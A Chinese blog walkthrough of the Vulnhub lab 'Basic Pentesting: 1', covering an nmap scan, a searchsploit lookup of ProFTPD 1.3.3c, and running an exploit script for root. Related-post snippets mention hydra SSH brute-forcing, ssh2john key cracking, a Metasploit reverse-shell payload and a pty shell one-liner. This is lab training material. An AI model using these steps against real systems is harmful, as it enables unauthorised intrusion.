Basic Pentesting: 1

最新推荐文章于 2024-08-27 15:58:06 发布
最新推荐文章于 2024-08-27 15:58:06 发布
阅读量158 收藏
点赞数 1
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/141094767
版权

一、主机发现

二、信息收集

1.扫描靶机开放的端口

nmap -A 192.168.36.133

ftp版本为ProFTPD 1.3.3c

2.查找历史漏洞,存在命令执行漏洞

searchsploit ProFTPD 1.3.3c

三、提权

1.下载利用脚本

命令下或者上网页下都行,网不太行就上网页下

然后拖到kali里就行

运行

python proFTPD_1.3.3c_exploit.py 攻击机ip 靶机ip

1.提权成功

蓝天模糊
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BASIC PENTESTING: 1打靶渗透【附代码】(权限提升)
weixin_52487093的博客
08-05 199
BASIC PENTESTING: 1打靶渗透【附代码】(权限提升)
Basic Pentesting:2靶机
m0_65285254的博客
08-08 250
通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。靶机开放了445端口,可以使用enum4linux工具枚举smb服务的信息,开放22、80、139、445、8009、8080 端口。使用hydra工具爆破jan用户的ssh密码。sudo -l查看一下具有sudo权限的程序。需要密码 是pass.bak 的内容。查看 /home/key 下的文件。可以访问kay用户的ssh私钥文件。查看pass.bak文件。主机发现 查看开放端口。得到 armando。
Basic Pentesting: 2靶机
weixin_73074638的博客
08-10 257
得到可能为密码的值heresareallystrongpasswordthatfollowsthepasswordpolicy$$通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。得到两个用户分别是 kay 、 jan对应的就是k用户和j用户。因为端口扫描ssh服务开启,j用户存在弱口令,尝试用九头蛇爆破。cat pass.bak,拒绝访问。得到密码beeswax再次尝试连接。拼接/development/再次查看pass.bak文件。得到密码为armando。
[Vulnhub] basic_pentesting_1
weixin_63231007的博客
07-01 632
靶机:192.168.236.133 访问试试,没有得到可用信息。 获得了ftp服务的版本,想搜索一下该版本是否有可利用的漏洞的话,可用msfconsole 发现了一个该版本可利用漏洞 使用use命令,输入序号即可,0 进入该漏洞 exploitshow options 看一下参数,一个是RHOSTS 一个是RPORT 通过set命令来设置一下地址和端口,set RHOSTS 192.168.236.133下一步设置payload:set payload cmd/unix/reverse 这个是反向连接的
【vulnhub】Basic Pentesting :2靶机
wbplife的博客
08-06 374
445端口:靶机开放了445端口,可以使用enum4linux工具枚举smb服务的信息,发现两个用户名:kay、jan。发现/home/kay/目录存在pass.bak文件,但目前我们没有访问权限;发现可以访问kay用户的ssh私钥文件。通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。根据之前的提示,使用hydra工具爆破jan用户的ssh密码,得到:jan:armando。需要输入密码,输入上面pass.bak里的试一下,发现成功。查看pass.bak文件。
basic_pentesting1靶机
qq_68865419的博客
10-19 248
这次我们使用一种新方法查看靶机的ipNetdiscover:二层发现工具,拥有主动和被动发现两种方式。首先查看靶机的ip​​​​​​然后查看本机的ip,使用ipconfig然后扫描靶机ip。
Vulnhub靶机:basic_pentesting_1
qq_48904485的博客
02-29 447
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:basic_pentesting_1(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/
basic_pentesting_1靶机渗透
weixin_64809022的博客
06-23 743
Python提权: python3 -c 'import pty;pty.spawn("/bin/bash")'
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 669
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
BasicPentesting:从TryHackMe清除基本渗透测试室
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到... 在ssh服务器中,使用与John一起
tryhackme-writeups:可在TryHackMe.com上获得有关ROOMS的文章
03-09
TryHackMe撰写 是一个免费的在线平台,可通过您的浏览器使用动手练习和实验来学习网络安全! 客房 姓名 困难 简单 简单 简单 简单 中等的 简单 简单 简单 简单 中等的 中等的
大量的备忘单:我大量的备忘单(编码,备忘,引脚排列,命令列表等)的一部分
01-30
1. **编程语言**: - **JavaScript**: 一种广泛用于网页和应用开发的脚本语言,尤其在客户端编程中不可或缺。备忘单可能包含变量声明、函数、对象、DOM操作、事件处理等内容。 - **Python**: 强大的解释型语言,常...
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 783
靶场提权
浏览器发送HTTP请求的过程
学Python的小白!
08-25 1491
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
服务器远程管理
m0_64827698的博客
08-26 539
SSH两种级别的安全认证:基于口令(口令在网络上传播,易受中间人攻击),基于密钥(传公钥,公钥是否相同,公钥加密质询,私钥解密)(密钥不在网络上传)2.启用服务services.msc(telnet)/配置远程桌面服务gpedit.msc(rdp)/使⽤SSH,你可以把所有传输的数据进⾏加密,这样“中间 ⼈”这种攻击⽅式就不可能实现了。实验总结:在windows开启telnet服务(2019不支持),RDP服务,SSH。SSH协议允许⽤户通过配置⽂件⾃定义选择加密算法,以优化安全性和性能。
哪些类型的企业需要开展TPM管理培训?
tianxingjian713的博客
08-23 1258
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
系统编程 网络 http协议
qq_69971969的博客
08-24 797
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web端网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
33.python socket
最新发布
笔生花的博客
08-27 1118
python socket 心跳包 数据包
构建高级渗透测试虚拟实验室:实践与专业技巧
《构建高级渗透测试虚拟实验室》(Building Virtual Pentesting Labs for Advanced Penetration Testing, PACKT, 2014)是一本专注于指导读者如何构建自己的虚拟渗透测试实验室的专业教材。在当前网络安全形势日益严峻...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值